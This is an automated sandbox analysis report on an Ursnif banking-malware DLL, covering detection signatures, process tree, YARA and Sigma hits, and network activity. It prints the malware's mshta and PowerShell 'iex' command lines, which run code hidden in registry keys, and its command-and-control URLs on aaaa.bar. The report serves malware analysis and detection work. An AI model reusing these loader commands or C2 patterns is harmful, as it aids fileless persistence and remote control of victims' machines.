Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report gECym.bin

Overview

General Information

Sample Name:gECym.bin (renamed file extension from bin to dll)
Analysis ID:506330
MD5:fcb53acd5fd1637a2ac1bc69f396e92c
SHA1:a09432a56375c5a39856d59e402c3f8642edda7b
SHA256:cc7045d9fe77c4aa4cb646d01fb4700008a34f58f49358d0b0b0997d21016aab
Tags:7412exegreenpassisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Writes or reads registry keys via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2908 cmdline: loaddll32.exe 'C:\Users\user\Desktop\gECym.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5032 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4892 cmdline: rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 1368 cmdline: regsvr32.exe /s C:\Users\user\Desktop\gECym.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 2376 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2856 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 4908 cmdline: rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4864 cmdline: rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6232 cmdline: rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • mshta.exe (PID: 5352 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1140 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 5956 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4856 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 2620 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1640 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 50 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.rundll32.exe.2a90000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.2.loaddll32.exe.f30000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.2.loaddll32.exe.10000000.3.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.10000000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    0.2.loaddll32.exe.37194a0.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: gECym.dllVirustotal: Detection: 10%Perma Link
                      Source: 0.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: gECym.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49821 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49825 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49826 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49837 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49952 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49954 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49963 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49969 version: TLS 1.2

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: aaaa.bar
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.220.111.98 187
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: loaddll32.exe, 00000000.00000003.725335981.000000000124A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.769019185.0000000003322000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.750727112.0000000003333000.00000004.00000001.sdmpString found in binary or memory: https://aaaa.bar/
                      Source: loaddll32.exe, 00000000.00000002.798277026.0000000001160000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.800825641.000000000122E000.00000004.00000020.sdmpString found in binary or memory: https://aaaa.bar/jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2
                      Source: loaddll32.exe, 00000000.00000002.800982427.000000000123F000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmpString found in binary or memory: https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF
                      Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmpString found in binary or memory: https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovu
                      Source: unknownDNS traffic detected: queries for: www.msn.com
                      Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: geolocation.onetrust.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.9973131461099627 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad-delivery.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad.doubleclick.netConnection: Keep-AliveCookie: IDE=AHWqTUkh5fOLAUMX20ZV8xqf__2tu45ymTec8GQqE60qWk9cSV6VA3zk_7PBuUk4
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cache
